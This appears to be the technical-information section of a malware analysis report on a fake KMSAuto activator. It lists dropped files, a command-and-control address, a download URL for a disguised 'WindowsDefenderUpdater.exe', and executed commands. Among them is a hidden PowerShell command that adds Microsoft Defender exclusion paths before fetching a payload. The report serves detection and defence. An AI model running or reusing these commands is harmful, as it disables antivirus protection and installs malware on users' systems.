Technical Information
- %TEMP%\kmsauro-x64\killduplicate.cmd
- %TEMP%\kmsauro-x64\kmsauto x64.exe
- %TEMP%\d64f2a9b-4389-40a4-8336-d7174dd105e0\agiledotnetrt64.dll
- %ALLUSERSPROFILE%\windowsdefenderupdater.exe
- %TEMP%\kmsauro-x64\killduplicate.cmd
- %TEMP%\kmsauro-x64\killduplicate.cmd
- %TEMP%\kmsauro-x64\kmsauto x64.exe
- '18#.#54.14.5':30000
- http://18#.##4.14.5:30000/tswv58ka/WindowsDefenderUpdater.exe via 18#.#54.14.5
- '%TEMP%\kmsauro-x64\kmsauto x64.exe'
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\KMSAuro-x64\KillDuplicate.cmd" "%TEMP%\KMSAuro-x64" "<File name>.exe""' (with hidden window)
- '%TEMP%\kmsauro-x64\kmsauto x64.exe' ' (with hidden window)
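- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' # # Добавление в исключения Add-MpPreference -ExclusionPath '%ProgramFiles%\' Add-MpPreference -ExclusionPath '%ALLUSERSPROFILE%\' # URL и путь к файлу $FileUrl = 'http://185.154.14.5:30000...' (with hidden window) [Script comments, translated from Russian: "Adding to exclusions" and "URL and path to the file". The visible part of the command adds %ProgramFiles%\ and %ALLUSERSPROFILE%\ to the Microsoft Defender exclusion paths and then sets the download URL; the command line is cut off after that point in this report.]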
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\KMSAuro-x64\KillDuplicate.cmd" "%TEMP%\KMSAuro-x64" "<File name>.exe""